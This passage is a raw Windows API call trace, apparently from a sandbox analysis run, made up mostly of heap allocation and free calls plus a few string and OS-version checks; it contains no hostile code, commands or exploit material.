[0165.554] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0165.554] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0165.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0165.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0165.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.555] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.555] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0165.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.555] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0165.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.556] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.556] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.556] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0165.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.556] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c28 [0165.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.556] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0165.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0165.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0165.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0165.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.557] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0165.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0165.557] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0165.557] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0165.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0165.557] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0165.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0165.558] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0165.558] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.558] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0165.558] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0165.559] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0165.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0165.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0165.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0165.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0165.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.559] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.559] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0165.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0165.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0165.559] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0165.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0165.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0165.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.560] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0165.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0165.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0165.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0165.560] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.560] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0165.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0165.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.561] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.561] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0165.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0165.561] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0165.561] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0165.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa568 [0165.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0165.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9708 [0165.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0165.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0165.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0165.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0165.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0165.562] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.562] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0165.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.563] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0165.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0165.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0165.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0165.563] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0165.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0165.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0165.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0165.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.563] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0165.563] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.563] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0165.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0165.564] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0165.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0165.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0165.564] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0165.564] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.564] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0165.565] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0165.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0165.565] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0165.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0165.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0165.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0165.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0165.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.565] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.565] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.566] HeapFree (in: 